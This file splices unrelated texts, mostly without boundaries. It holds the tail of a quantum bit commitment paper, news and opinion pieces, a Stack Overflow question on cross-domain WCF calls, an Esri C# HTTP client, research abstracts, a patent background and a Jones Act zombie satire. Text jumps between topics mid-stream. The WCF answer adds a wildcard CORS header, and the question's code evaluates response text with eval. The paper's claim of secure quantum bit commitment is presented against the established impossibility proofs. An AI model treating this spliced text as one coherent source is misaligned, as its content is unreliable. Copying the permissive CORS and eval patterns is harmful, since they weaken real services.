It remains to show that (\[eq:8\]) can be checked and that no security leak could occur during the checking process. In contrast to the states sent in by Bob, it is more complicated to check (\[eq:8\]) since Alice has already committed by then, but it can be done as follows.\
Checking of Entanglement (\[eq:8\]):
Alice first sends her ancillas of (\[eq:8\]) to Bob with an entanglement basis unknown to him. Then Bob sends Alice’s committed qubit back to her, and she turns it back into the original state by reversing her $U_\sb$. Then she sends all the qubits back to Bob, who can thus verify (\[eq:8\]).
We now show that there can be no security compromise in the checking and that each party must follow the prescription, as all the relevant states can be checked. First, Bob can derive no information on which of the qubits he sent is committed without first knowing what qubit positions are indicated by what ancilla state; the ancilla he receives back from Alice is a totally random state to him. Secondly, Alice must send in her entanglement ancilla and tell Bob later exactly what the total state is, as prescribed in the checking. Third, that Bob then sends back the correct qubit can be checked by Alice by asking Bob to send back all the relevant states in his possession, which include his ancilla, Alice’s committed qubit, and her ancilla that was sent to him. Alice can then check similarly to the beginning check on Bob’s $n$ qubit-ancilla states. Finally, Alice must send back the proper states, or else Bob cannot verify (\[eq:8\]).
We have completed the security proof with the proper operating procedure for QBC1. Assuming honest operation, which we have shown can all be checked, the protocol can be summarized simply as follows: Bob sends Alice $n$ qubits, each entangled with an ancilla he keeps; Alice commits to $\sb$ by applying $U_\sb$ to one of the qubits and entangling as in (\[eq:8\]); to open, she reveals $\sb$ and the position of the committed qubit, which Bob verifies with his ancillas.
Scope of QBC Possibility {#sec:scope}
========================
It has long been known that a trusted third party or special relativistic effects can be used to establish secure bit commitment protocols, both classically and quantum mechanically. Furthermore, D’Ariano has suggested [@dariano09] that causality or time order cannot be purified and is built into quantum mechanics already, in a way that would imply special relativity. If true, this would imply that quantum mechanics by itself ensures the possibility of secure QBC, similar to Kent’s relativistic protocol [@kent]. Cheung [@chau3] has recently proposed a secure protocol on the basis of a timing effect. In this paper, we show that quantum mechanics allows secure QBC without invoking causality or timing, in a way that was first described in [@qbc3].
The exact mechanism by which our QBC1 falls outside the standard impossibility proof is made clear in section \[sec:newappr\] above. There seem to be some vague claims of universal QBC impossibility in refs. [@dariano07] and [@chis]. Both papers are presented in unfamiliar mathematical formulations of $C^\ast$-algebras or “quantum combs”, with no translation into the usual formulation. In both of these new formulations, there is no clear indication of exactly what would happen when one party is found cheating during protocol execution. Just aborting the protocol is not enough, as one party can keep on cheating, as discussed in section \[sec:newappr\]. While the number of allowable protocol abortions may be bounded in [@chis], cheating detection entails no penalty in any form. More significantly, it appears that no restriction is put on the parties’ entanglement purification, and a private ancilla not to be checked is allowed, thus excluding QBC1 from these formulations.
A most important point, not addressed in any of the impossibility proofs that claim universality, is *what the proof is* that all possible QBC protocols have been included. A general discussion of this issue can be found in [@yuen1]. A main point that has *not* even been made clear in [@yuen1] is that a ‘machine’ formulation cannot capture all the possible protocols, classical or quantum, that can be clearly formulated in ordinary natural language, due to the ‘meaning’ problem. A specific intended meaning can be captured by a mechanical process, but not all possible meanings in a general context. This is the situation of human knowledge that, I believe, will not change in the future. In the present QBC issue, one manifestation of this situation is that there is no general mathematical definition that captures all possible QBC protocols.
As a concluding remark, practical QBC protocols can be developed that can be proved secure within technological limits that are unlikely to be removed in the foreseeable future. Entanglement across many qubits already by itself falls under these limits. Such implementable protocols could be practically significant even if they are not unconditionally secure under the impractical assumption of ideal system devices and components.
Acknowledgments {#acknowledgments .unnumbered}
===============
I would like to thank C.Y. Cheung, G.M. D’Ariano, and M. Ozawa for very useful discussions.
H.P. Yuen, quant-ph/0808.2040v1 (2008).
G.M. D’Ariano, D. Kretschmann, D. Schlingemann, and R.F. Werner, Phys. Rev. A [**76**]{}, 032328 (2007).
D. Mayers, Phys. Rev. Lett. [**78**]{}, 3414 (1997).
H.K. Lo and H.F. Chau, Phys. Rev. Lett. [**78**]{}, 3410 (1997).
H.K. Lo and H.F. Chau, Fortschr. Phys. [**46**]{}, 907 (1998).
H.K. Lo and H.F. Chau, Physica D [**120**]{}, 177 (1998).
G. Brassard, C. Crépeau, D. Mayers, and L. Salvail, preprint quant-ph/9712023.
G. Brassard, C. Crépeau, D. Mayers, and L. Salvail, preprint quant-ph/9806031.
R.W. Spekkens and T. Rudolph, Phys. Rev. A [**65**]{}, 012310 (2001).
H.P. Yuen, quant-ph/0109055.
H.P. Yuen, in [*Quantum Communication, Measurement, and Computing*]{}, ed. by J.H. Shapiro and O. Hirota, Rinton Press, 2003, p. 371; also preprint quant-ph/0210206.
H.P. Yuen, quant-ph/0207089v3 (2002).
H.P. Yuen, quant-ph/0305144v3 (2003).
M. Ozawa, private communication, Sep 2001.
C.Y. Cheung, quant-ph/0508180 (2005).
C.Y. Cheung, quant-ph/0601206 (2006).
C. Döscher and M. Keyl, Fluct. Noise Lett. [**4**]{}, R125 (2002); also quant-ph/0206088.
See [@yuen1] and the appendices of H.P. Yuen, quant-ph/0305142 (2003) and quant-ph/0305143 (2003).
Essentially the same protocol is called QBC3 in H.P. Yuen, in [*Quantum Communication, Measurement, and Computing*]{}, ed. by O. Hirota, J.H. Shapiro and M. Sasaki, NICT Press, Japan, 249 (2007); also quant-ph/0702074v4 (2007).
G.M. D’Ariano, private communication, Nov 2009.
A. Kent, Phys. Rev. Lett. [**83**]{}, 1447 (1999).
C.Y. Cheung, quant-ph/0910.2645 (2009).
G. Chiribella, G.M. D’Ariano, P. Perinotti, D. Schlingemann, and R.F. Werner, quant-ph/0905.3801 (2009).
Create a social network, make a fortune, influence public opinion and surround yourself with politicians… all in order to get elected to the head of the world's greatest power? Mark Zuckerberg, founder of Facebook and billionaire philanthropist, keeps accumulating clues that suggest a politicization of his activities. According to the site Politico, the 33-year-old CEO of the social network and his wife Priscilla Chan have just recruited Joel Benenson, the Clintons' polling guru. Officially, for a consulting job within the couple's philanthropic foundation, the Chan Zuckerberg Initiative, whose stated goal is to "advance human potential and promote equal opportunity."

Still, ever since Zuckerberg published photos of his travels, notably across Iowa, the first state to hold primaries, many have suspected him of less charitable intentions. So much so that on May 21 he had to deny on his Facebook page any intention of seeking the Democratic nomination in 2020: "My goal this year is to visit every state I haven't spent time in, to learn about people's hopes and problems, and how they think about their work and their communities […]. Some of you are wondering whether this challenge means I am running for president. That is not the case."

Who is Joel Benenson, Zuckerberg's new hire?

Joel Benenson played a role as a pollster in Bill Clinton's 1996 reelection, before becoming one of Barack Obama's main advisers during his two terms and subsequently handling strategy and polling for candidate Hillary Clinton in 2016.

Granted, the firm Benenson Strategy Group has only been given a research assignment for the Zuckerbergs' foundation. And this is not the first time it has worked with a nonprofit, having previously worked for pop star Lady Gaga's "Born This Way Foundation." But the profile and résumé of Benenson, who declined to comment to Politico, are fueling speculation about Zuckerberg's hidden agenda.

Other signs of politicization have emerged

Especially since the pollster is not the first major political figure to join Zuckerberg's ranks. Last January it was David Plouffe, Obama's 2008 campaign manager, and Ken Mehlman, who ran George W. Bush's campaign in 2004, not to mention Amy Dudley, a former communications adviser to the Democratic senator from Virginia, Tim Kaine. Zuckerberg even recruited the White House photographer Charles Ommanney, known for his portraits of presidents George W. Bush and Barack Obama.

Moreover, Mark Zuckerberg's name appears on several lists of potential candidates for the 2020 presidential election, including CNN's, which counts him among "at least 22 Democrats considering entering the race" for the next presidential election.
Q:
WCF web service with CROSS Domian Ajax not working
I am getting an error when calling a WCF service via an Ajax request using JSONP.
below is my web.config
<?xml version="1.0"?>
<configuration>
<system.web>
<compilation debug="true" targetFramework="4.0" />
</system.web>
<system.serviceModel>
<services>
<service name="RestService.RestServiceImpl" behaviorConfiguration="ServiceBehaviour">
<endpoint address="" binding="webHttpBinding" contract="RestService.IRestServiceImpl" behaviorConfiguration="web"></endpoint>
<endpoint address="basic" binding="basicHttpBinding" name="HttpEndPoint" contract="RestService.IRestServiceImpl" ></endpoint>
<endpoint
address="Service1.svc"
binding="mexHttpBinding"
contract="IMetadataExchange"/>
</service>
</services>
<behaviors>
<serviceBehaviors>
<behavior name="ServiceBehaviour">
<!-- To avoid disclosing metadata information, set the value below to false before deployment -->
<serviceMetadata httpGetEnabled="true" />
<!-- To receive exception details in faults for debugging purposes, set the value below to true. Set to false before deployment to avoid disclosing exception information -->
<serviceDebug includeExceptionDetailInFaults="true"/>
</behavior>
</serviceBehaviors>
<endpointBehaviors>
<behavior name="web">
<webHttp/>
</behavior>
</endpointBehaviors>
</behaviors>
<bindings>
<webHttpBinding>
<binding name="webHttpBindingWithJsonP" crossDomainScriptAccessEnabled="true" />
</webHttpBinding>
</bindings>
<serviceHostingEnvironment multipleSiteBindingsEnabled="true" />
</system.serviceModel>
<system.webServer>
<modules runAllManagedModulesForAllRequests="true"/>
<!--
To browse web app root directory during debugging, set the value below to true.
Set to false before deployment to avoid disclosing web app folder information.
-->
<directoryBrowse enabled="true"/>
</system.webServer>
</configuration>
And my interface:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.Serialization;
using System.ServiceModel;
using System.ServiceModel.Web;
using System.Text;
namespace RestService
{
// NOTE: You can use the "Rename" command on the "Refactor" menu to change the interface name "IRestServiceImpl" in both code and config file together.
[ServiceContract]
public interface IRestServiceImpl
{
[WebInvoke(Method = "GET",
ResponseFormat = WebMessageFormat.Json,
BodyStyle = WebMessageBodyStyle.Wrapped,
UriTemplate = "getallemp")]
[return: MessageParameter(Name = "success")]
string GetAllEmployee();
}
}
And below is my service class:
using System;
using System.Collections.Generic;
using System.Data;
using System.Linq;
using System.Runtime.Serialization;
using System.ServiceModel;
using System.Text;
using WebService.DataLayer;
namespace RestService
{
// NOTE: You can use the "Rename" command on the "Refactor" menu to change the class name "RestServiceImpl" in code, svc and config file together.
// NOTE: In order to launch WCF Test Client for testing this service, please select RestServiceImpl.svc or RestServiceImpl.svc.cs at the Solution Explorer and start debugging.
public class RestServiceImpl : IRestServiceImpl
{
public string GetAllEmployee()
{
cls_datalayer obj = new cls_datalayer();
DataTable dt = obj.getDataTableFromQuery("select usercode from users where empstatus='A'");
return ConvertDataTabletoString(dt);
}
public string ConvertDataTabletoString(DataTable dt)
{
System.Web.Script.Serialization.JavaScriptSerializer serializer = new System.Web.Script.Serialization.JavaScriptSerializer();
serializer.MaxJsonLength = 50000000;
List<Dictionary<string, object>> rows = new List<Dictionary<string, object>>();
Dictionary<string, object> row;
foreach (DataRow dr in dt.Rows)
{
row = new Dictionary<string, object>();
foreach (DataColumn col in dt.Columns)
{
row.Add(col.ColumnName, dr[col]);
}
rows.Add(row);
}
return serializer.Serialize(rows);
}
}
}
When I call this from the browser it works: From Browser
But when I try this from a cross-domain Ajax request, I get an error:
$.ajax({
type: "GET",
url: 'http://localhost:59672/RestServiceImpl.svc/getallemp',
contentType: "application/json",
dataType: "jsonp",
cache: false,
jsonpCallback: 'callback',
success: function (data) {
alert();
},
error: function (xhr) {
//console.log(xhr);
var err = eval("(" + xhr.responseText + ")");
}
});
then I get an error; please check the attachments: Attachment 01
Attachment 02
A:
This worked better for me than the Web.config version:
Create a Global.asax
Add this code to the Global.asax.cs
protected void Application_BeginRequest(object sender, EventArgs e)
{
HttpContext.Current.Response.AddHeader("Access-Control-Allow-Origin" , "*");
if (HttpContext.Current.Request.HttpMethod == "OPTIONS")
{
HttpContext.Current.Response.AddHeader("Access-Control-Allow-Methods", "GET, POST");
HttpContext.Current.Response.AddHeader("Access-Control-Allow-Headers", "Content-Type, Accept");
HttpContext.Current.Response.AddHeader("Access-Control-Max-Age", "1728000");
HttpContext.Current.Response.End();
}
}
We won't be silenced. And Hillary Clinton will not be bullied by Trump, who is in lockstep with the NRA and its dangerous "guns everywhere" agenda. While this is a new spin on trying to intimidate a female gun violence prevention champion, it will fail, just as it has failed with Moms Demand Action volunteers across the country. It comes down to this: Our opponents are afraid someone will take away their guns. We are afraid our children will be shot and killed. You tell me who has more fight in them. The fact is that women are at the forefront of the gun safety movement and that’s no coincidence — women are disproportionately affected by weak gun laws. We represent 50% of victims of mass shootings and are put at risk by lax laws that make it far too easy for abusive partners to access a gun. Every month, more than 50 American women are shot to death by a current or former boyfriend or husband. We have to do better. I know that, and Hillary Clinton knows that too. That’s why we’ll continue to press for common sense solutions — like demanding a background check on every gun sale — that prove that we can respect the Second Amendment while making everyone safer.
2019-07-24T13:56:35+00:00
By John Askounis/ info@eurohoops.net
At 34 years of age, Sofoklis Schortsanitis is determined to give it a go once more. Ionikos Nikaias AFFIDEA announced his addition to its Greek Basket League squad on Wednesday.
Schortsanitis was crowned EuroLeague champion back in 2014 with Maccabi Tel Aviv. However, a downfall followed.
He was the 34th pick of the 2003 NBA draft, but never made it to the NBA. He instead showcased his impressive strength in the paint all around Europe and in FIBA competitions with the Greek National Team.
His second stint with Maccabi brought him the EuroLeague title. He also captured three Super League championships and four Cups in Israel gaining the love of the fans up to this day.
Injuries and fitness issues have held him back recently, cutting his previous attempts for a comeback short during the 2017-18 season with Trikala. He hopes for a different outcome with Ionikos, a side that will return to Greece’s premium competition this season.
/* See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* Esri Inc. licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Net;
namespace com.esri.gpt.csw
{
/// <summary>
/// CswClient class is used to submit CSW search request.
/// </summary>
/// <remarks>
/// CswClient is a wrapper class of .NET HttpWebRequest and HttpWebResponse. It basically submits
/// a HTTP request then return a text response.
/// </remarks>
///
public class CswClient
{
private CredentialCache _credentialCache;
static CookieContainer _cookieContainer; //use static variable to be thread safe
private String downloadFileName = "";
private bool retryAttempt = true;
#region Constructor
/// <summary>
/// Constructor
/// </summary>
public CswClient()
{
_credentialCache = new CredentialCache();
_cookieContainer = new CookieContainer();
}
#endregion
#region PublicMethods
/// <summary>
/// Submit HTTP Request
/// </summary>
/// <param name="method">HTTP Method. for example "POST", "GET"</param>
/// <param name="URL">URL to send HTTP Request to</param>
/// <param name="postdata">Data to be posted</param>
/// <returns>Response in plain text</returns>
public string SubmitHttpRequest(string method, string URL, string postdata)
{
return SubmitHttpRequest(method, URL, postdata, "", "");
}
/// <summary>
/// Submit HTTP Request
/// </summary>
/// <remarks>
/// Submit an HTTP request.
/// </remarks>
/// <param name="method">HTTP Method. for example "POST", "GET"</param>
/// <param name="URL">URL to send HTTP Request to</param>
/// <param name="postdata">Data to be posted</param>
/// <param name="usr">Username</param>
/// <param name="pwd">Password</param>
/// <returns>Response in plain text.</returns>
public string SubmitHttpRequest(string method, string URL, string postdata, string usr, string pwd)
{
String responseText = "";
HttpWebRequest request;
Uri uri = new Uri(URL);
request = (HttpWebRequest)WebRequest.Create(uri);
request.AllowAutoRedirect = true;
if(method.Equals("SOAP")){
request.Method = "POST";
request.Headers.Add("SOAPAction: Some-URI");
request.ContentType = "text/xml; charset=UTF-8";
}
else if (method.Equals("DOWNLOAD"))
{
request.Method = "GET";
}
else{
request.ContentType = "text/xml; charset=UTF-8";
request.Method = method;
}
// Credential and cookies
request.CookieContainer = _cookieContainer;
NetworkCredential nc = null;
String authType = "Negotiate";
if (_credentialCache.GetCredential(uri, authType) == null && _credentialCache.GetCredential(uri, "Basic") == null)
{
if (!String.IsNullOrEmpty(usr) && !String.IsNullOrEmpty(pwd))
{
nc = new NetworkCredential(usr, pwd);
_credentialCache.Add(uri, "Basic", nc);
_credentialCache.Add(uri, authType, nc);
}
else{
nc = System.Net.CredentialCache.DefaultNetworkCredentials;
_credentialCache.Add(uri, authType, nc);
}
}
request.Credentials = _credentialCache;
// post data
if (request.Method.Equals("POST", StringComparison.OrdinalIgnoreCase))
{
UTF8Encoding encoding = new UTF8Encoding();
Byte[] byteTemp = encoding.GetBytes(postdata);
request.ContentLength = byteTemp.Length;
Stream requestStream = request.GetRequestStream();
requestStream.Write(byteTemp, 0, byteTemp.Length);
requestStream.Close();
}
HttpWebResponse response = null;
try{
response = (HttpWebResponse)request.GetResponse();
}
catch (UnauthorizedAccessException ua)
{
if (retryAttempt)
{
PromptCredentials pc = new PromptCredentials();
pc.ShowDialog();
retryAttempt = false;
try
{
_credentialCache.Remove(uri, "Basic");
}
catch (Exception) { };
_credentialCache.Remove(uri, authType);
if (!String.IsNullOrEmpty(pc.Username) && !String.IsNullOrEmpty(pc.Password))
return SubmitHttpRequest(method, URL, postdata, pc.Username, pc.Password);
else
return null;
}
else
{
retryAttempt = true;
throw ua;
}
}
catch (WebException we)
{
if (retryAttempt)
{
PromptCredentials pc = new PromptCredentials();
pc.ShowDialog();
retryAttempt = false;
try
{
_credentialCache.Remove(uri, "Basic");
}catch(Exception){};
_credentialCache.Remove(uri, authType);
if (!String.IsNullOrEmpty(pc.Username) && !String.IsNullOrEmpty(pc.Password))
return SubmitHttpRequest(method, URL, postdata, pc.Username, pc.Password);
else
return null;
}
else
{
retryAttempt = true;
throw we;
}
}
if (_cookieContainer.GetCookies(uri) == null)
{
_cookieContainer.Add(uri, response.Cookies);
}
Stream responseStream = response.GetResponseStream();
if (method.Equals("DOWNLOAD"))
{
FileStream file = null;
string fileName = response.GetResponseHeader("Content-Disposition");
string[] s = null;
if (fileName.ToLower().EndsWith(".tif"))
{
s = URL.Split(new String[] { "coverage=" }, 100, StringSplitOptions.RemoveEmptyEntries);
s[1] = s[1].Trim() + ".tif";
}
else
{
s = fileName.Split('=');
s[1] = s[1].Replace('\\', ' ');
s[1] = s[1].Replace('"', ' ');
s[1] = s[1].Trim();
}
try
{
downloadFileName = System.IO.Path.Combine(Utils.GetSpecialFolderPath(SpecialFolder.ConfigurationFiles), s[1]);
System.IO.File.Delete(downloadFileName);
file = System.IO.File.Create(downloadFileName);
// Buffer to read 10K bytes in chunk:
byte[] buffer = new Byte[10000];
int length;
// Read the response in chunks until EOF (Read returns 0)
while ((length = responseStream.Read(buffer, 0, buffer.Length)) > 0)
{
file.Write(buffer, 0, length);
}
}
catch (Exception e)
{}
finally
{
if(file != null)
file.Close();
if(responseStream != null)
responseStream.Close();
retryAttempt = true;
}
return downloadFileName;
}
StreamReader reader = new StreamReader(responseStream);
responseText = reader.ReadToEnd();
reader.Close();
responseStream.Close();
return responseText;
}
/// <summary>
/// Encode PostBody
/// </summary>
/// <remarks>
/// Encode special characters (such as %, space, <, >, \, and &) to percent values.
/// </remarks>
/// <param name="postbody">Text to be encoded</param>
/// <returns>Encoded text.</returns>
public string EncodePostbody(string postbody)
{
postbody = postbody.Replace(@"%", @"%25");
postbody = postbody.Replace(@" ", @"%20");
postbody = postbody.Replace(@"<", @"%3c");
postbody = postbody.Replace(@">", @"%3e");
postbody = postbody.Replace("\"", @"%22"); // double quote
postbody = postbody.Replace(@"&", @"%26");
return postbody;
}
#endregion
}
}
Letual cashback benefits!
To receive the cashback, read the rules carefully. For example, before making a purchase you should disable your ad blocker, if you have one installed, as well as.
Background: START, a Study of Trauma and Reduction of HIV Transmission, is a cross-sectional study that will examine whether traumatic stress contributes to potentially amplified transmission (PAT) risk behavior (the co-occurrence of detectable HIV viral load and HIV transmission risk) among stimulant-using men who have sex with men (MSM). Stimulant-using MSM are most heavily affected by HIV, despite the widespread availability of antiretroviral therapy (ART).1 Treatment as Prevention (TasP), defined as expanded ART access to achieve sustained viral suppression, is a promising biomedical prevention approach that will be utilized. While literature supports that early ART initiation decreases HIV transmission rates, stimulant-using MSM were excluded from these landmark trials. Stimulant-using MSM are known for low utilization and low engagement in HIV-related care thereby resulting in higher viral loads and high HIV transmission rates.2 The overarching objective of this proposed study is to identify modifiable risk factors associated with PAT to inform the development of innovative, theory-based interventions to optimize the effectiveness of TasP in stimulant-using MSM. Resulting information will inform the development of HIV/AIDS prevention approaches enhancing the effectiveness of TasP in stimulant-using MSM, thereby decreasing HIV transmission rates. Relation to Training: This proposal is designed to provide in-depth research training. Pathway analysis will be conducted to understand the role of psychosocial factors in the relationship between traumatic stress and PAT. The results will provide preliminary data for the preparation of a K99/R00 grant, which will be used to develop and pilot test a behavioral intervention to reduce traumatic stress symptoms and HIV transmission in stimulant- using MSM. This F31 proposal is a logical step in becoming an independent nurse investigator. Innovation: The study is innovative in three ways. 
First, PAT, a co-occurring outcome variable, will be utilized to model an outcome most closely linked with high HIV-viral transmission efficiency; second, the potential mediational role of psychosocial factors in the relationship between traumatic stress and PAT will be explored; and third, novel techniques will be utilized, including (a) the Balloon Analogue Risk Task (BART) measure of impulsivity while eliminating the limitation of a self-report measure requiring self-insight and awareness, and (b) Audio Computer Assisted Self Interviewing (ACASI), which is used in behavioral research to minimize recall and social desirability bias and enhance the veracity of self-report, thereby increasing internal and external validity.
|
{
"pile_set_name": "NIH ExPorter"
}
|
The Banner Saga composer faces $50,000 fine for his work on the game
Austin Wintory, composer for the games Journey and The Banner Saga, is facing a fine of up to $50,000 as a result of his work on Stoic's Viking RPG. According to Wintory, his union, the American Federation of Musicians, has charged him for working on the game's soundtrack with non-union musicians. Earlier this week, Wintory released a video explaining the charges and setting out what he calls an "untenable situation".
The threat can be traced back to a contract drawn up by the AFM two years ago. That contract—which Wintory says wasn't voted on by AFM members—was universally rejected by game makers. Effectively, AFM members have been blocked from working on games since the contract's introduction.
|
{
"pile_set_name": "Pile-CC"
}
|
1. Field of the Invention
The invention is directed towards a shadow mask back ring structure for use in color television picture tubes.
2. Description of the Prior Art
A shadow mask is an apertured, curved conductive member, which operates as the electron beam limiting electrode in a color television picture tube. An example of the typical shadow mask structure is seen in U.S. Pat. No. 3,639,799. The shadow mask typically has a curved aperture face portion surrounded by a solid skirt portion which is bent in a direction normal to the face portion of the shadow mask. This type of mask is typically formed of relatively thin metal to minimize the weight of the structure, and also to minimize thermal effects. It has been the practice to utilize a relatively thicker unitary metal reinforcing ring which is rigidly affixed to the back end of the mask skirt portion to strengthen and stabilize the shadow mask. It has been found necessary to use a unitary reinforcing ring to achieve the desired strength, and to avoid distortion due to nonsymmetrical thermal heating.
In preparing such a unitary reinforcing ring, it has been the practice to stamp such rings from large metallic sheets. This structure and fabricating process results in significant scrap losses, and thus is an expensive, high waste production process.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
The US Commodity Futures Trading Commission (CFTC) revealed a new fintech initiative today that will find the regulator seeking to increase its participation in the ongoing global R&D effort related to blockchain and distributed ledger tech.
As part of a sweeping CFTC 2.0 proposal, the US options and futures regulator is launching LabCFTC, a fintech initiative that will seek to bolster the pace at which the regulator assesses new technologies. The aim, according to the CFTC, is to become “more accessible” to innovators working on new financial technologies through the program.
The CFTC also made public two LabCFTC components: GuidePoint, which is both an online tool providing a point of contact for entrepreneurs and a physical location in New York where they can find an open door for such guidance, and "CFTC 2.0", described as an initiative to foster and help initiate the adoption of new technology within the agency.
In statements today at the New York FinTech Innovation Lab, Chairman Christopher Giancarlo characterized the mission as one that would seek to explore new technologies including AI, machine learning and DLT.
In particular, he cited advances such as “smart contracts that value themselves and calculate payments in real-time” and “distributed ledger technology, more commonly known as blockchain” as innovations that will challenge the financial infrastructure today.
Giancarlo said of the program:
“We will look to explore ways to use fintech to enhance CFTC functions and duties. For example, we might collaborate with other authorities on leading development of best practices to support the development of ‘regulator nodes’ on distributed ledgers, or experiment with collecting or distributing existing CFTC reports through blockchain technology.”
As evidence of the need for action, Giancarlo cited the speed at which other enabling technologies – including automated trading – have reshaped modern financial markets and put new stress on regulators.
“The world is changing. Our parents’ financial markets are gone. The 21st century digital transformation is well underway,” he remarked.
Such a move finds the CFTC emerging as one of the more active global regulators when it comes to conceiving how it will respond to the advent of distributed ledger solutions.
Among the more active jurisdictions globally include Japan, where the legislature has passed national regulations aimed at cryptocurrencies, and Mauritius and Malta, which have recently announced initiatives aimed at providing clarity to regional innovators.
|
{
"pile_set_name": "OpenWebText2"
}
|
Marguerita Hagan: Wildlife & La Mer
March 2, 2017 - October 15, 2017
Between Terminals C and D | Ticketed Passengers
Philadelphia artist Marguerita Hagan is known for her ceramic sculpture inspired by the fantastical design and exquisite beauty of marine life. From diatoms – microscopic single-celled organisms – to giant blue whales, Hagan recreates the intricate aesthetics of oceanic life that she describes as “constantly perfecting itself for each unique environment.”

Hagan’s ceramic series emulates the complex underwater ecosystem and its extraordinary sea creatures. Her colorful convex circular forms that she refers to as shields are based on a variety of aquatic species. The wall-mounted circular domes offer a lens into the magnificent patterns and textures that swim underneath the water.

Similarly, Hagan’s all-white forms delve into the exotic intricacy and diversity of the single-celled creatures that populate the ocean from its deep abyss to the sunlit zone. These remarkably designed single-celled organisms photosynthesize more than half of earth’s oxygen. Hagan has said, “The intricate ceramic marine forms in white shine light on the wonder as well as the delicate, diverse, and mostly unseen life of the sea with which our lives are intrinsically linked.” Hagan’s sculpture celebrates the visual aesthetics of the ocean and “aims to bring more awareness to the environmental issues surrounding our vital relationship with it.”
|
{
"pile_set_name": "Pile-CC"
}
|
Bovine cathepsins S and L: isolation and amino acid sequences.
The purification procedure of cathepsin S includes acid activation of spleen homogenate, incubation at 37 degrees C, precipitation with (NH4)2SO4 in H2O/tert-butanol medium, gel chromatography, chromatofocusing, covalent chromatography and cation chromatography of FPLC system. Cathepsin S has a M(r) of about 24,000 Da with pI of 6.5 and 6.8. The mixture of both forms gave a single sequence. Cathepsin L was purified from bovine kidney by acid treatment and incubation at 37 degrees C, precipitation by (NH4)2SO4, two ion exchange chromatographies on CM-Sephadex, gel chromatography and ion exchange chromatography on FPLC system. Cathepsin L exists in multiple forms with pI 5.3-5.7 and M(r) of about 29,000 Da. N-terminal amino acid sequence confirms that cathepsin L and cathepsin S are different enzymes.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
The Top 5 Ways the Jones Act has left Honolulu Vulnerable to the Zombie Apocalypse
There has been a lot written about the harm caused by the Jones Act. On this very site, we’ve explored how the restrictive cabotage provision drives up the price of goods and contributes to Hawaii’s high cost of living. But while the Act certainly impacts the people of Hawaii on a day-to-day basis, there’s one element that no one is talking about:
The Jones Act has left Hawaii vulnerable to the Zombie Apocalypse.
It’s the dirty secret that no one in the state has uncovered … until now. Too many of Hawaii’s political leaders have been under the thumb of pro-Jones Act lobbyists like Big Zombie. But unless we take decisive action, you may find yourself cursing the price of nails while you search for materials to board up your windows.
Therefore, in the interest of preventing our state nickname from changing from “the Aloha State” to “Braaaaaiiiinnns” we present the top five ways that the Jones Act has made it more difficult for our citizens to fend off a zombie attack.
5. Skyrocketing energy costs will make sheltering in place unbearable.
We joke about the high price of living in paradise, but what about when skyrocketing energy costs force you to choose between taking refuge in a stifling house or watching a desiccated zombie hand grope its way through your open window? The Jones Act currently prevents affordable access to Liquid Natural Gas (LNG), which would help lower our energy bills. When you’re frantically chopping off zombie fingers and trying to reinforce the window screen, you’ll wish the Legislature had sought an exemption.
4. No ferry system to help us escape to (or gather help from) the other islands after the infrastructure collapses and the airport is overrun.
So you’ve put together a small, but hardy band of survivors and fought your way to the airport, only to see the only guy who knows how to fly get bitten when he inexplicably wandered off by himself to use the bathroom and/or meditate on the human condition. As you use one of your precious remaining bullets to put him out of his misery, you’ll wish there was some other major mode of public transport that could get you off the island. (After all, you had heard rumors that Kauai is zombie-free, and one of your group has received a few ham radio signals from a sanctuary in Maui.) If only the Jones Act didn’t bar the existence of an inter-island ferry system. Then you and your group could fight your way to the pier and make your escape to one of the other islands. (Assuming, of course, that you’ve already ascertained that your ferry driver is also bite-free. You’re not rookies anymore.)
3. You will inevitably find yourself with people who—despite being quite aware of the danger that surrounds them—will constantly let their guard down at the worst moment and get bitten, forcing you to face the death of your friends and companions on a near-constant basis.
O.k., this technically isn’t the fault of the Jones Act, but I think we can all agree that it is very, very annoying. Especially when even a child could outrun the average zombie. Seriously, how do zombies catch people? And why don’t people double-knot their shoes and close doors behind them?
2. Significant barriers to the creation of makeshift zombie-slaying weapons.
Ammunition is precious in the Zombie Apocalypse. Assuming that you haven’t been so unfortunate as to end up with super fast rage zombies, but are instead facing the more conventional slow-trudging variety, you’ll want to save your bullets by constructing a number of makeshift traps and weapons to kill the zombie invaders. If you’re especially cool, you might also want to dispatch the zombies with a katana. (Warning: If you’re not sure you’re cool enough to kill zombies with a sword, it is suggested you stick with more conventional weaponry, such as a baseball bat studded with spikes. Nothing is more pathetic than someone who can’t pull off awesome samurai moves trying to kill hordes of zombies with a katana. You may end up being the first to learn whether zombies can laugh at you. Before they eat your brains.)
Unfortunately, the Jones Act presents a serious bar to the creation of makeshift zombie-killing weapons and traps. We are forced to pay a premium for the supplies to be shipped from the mainland and—as anyone who has been involved in a building project on an outer island can tell you—that’s when the supplies are there at all. Nothing could be more disheartening than learning that the red paint you need to leave vague, disquieting messages on your house for passers-by is going to be two weeks late and 30% more expensive than you thought. And all that time spent honing your katana moves will be for naught when you realize that the ship from Japan you heard about is bypassing Hawaii because the Jones Act requires it to unload in California.
1. The high cost of food will lead to the formation of scavenging bands of raiders and possible cannibal enclaves.
Ever gripe about the high cost of cereal or lunch meat? Every day, right? Well just imagine how much worse it will be during the Zombie Apocalypse. In fact, most of your daily existence will be spent scavenging for food and trying to remember to check behind half-closed doors before ransacking someone’s pantry. (Don’t worry. That thump you heard was only the cat. Or a zombie trapped in the basement. Pro tip: Don’t investigate it. Just make sure the doors are closed.)
You may think that you can solve this problem by pooling together to start a farm or seeking out other survivors who are better situated. But if we’ve learned anything from fiction, it’s that your small garden will inevitably be attacked by scavenging bands of raiders. And then again by zombies. Trying to find other communities will only lead you into situations where you are suddenly under the thumb of a charismatic local psychopath, or have run into a group that has taken to cannibalism with a startling rapidity and comfort.
If only the Jones Act didn’t make food so expensive in Hawaii. Then you could relax in your own barricaded home with your plentiful supply of hoarded foodstuffs, safe from the chaos outside.
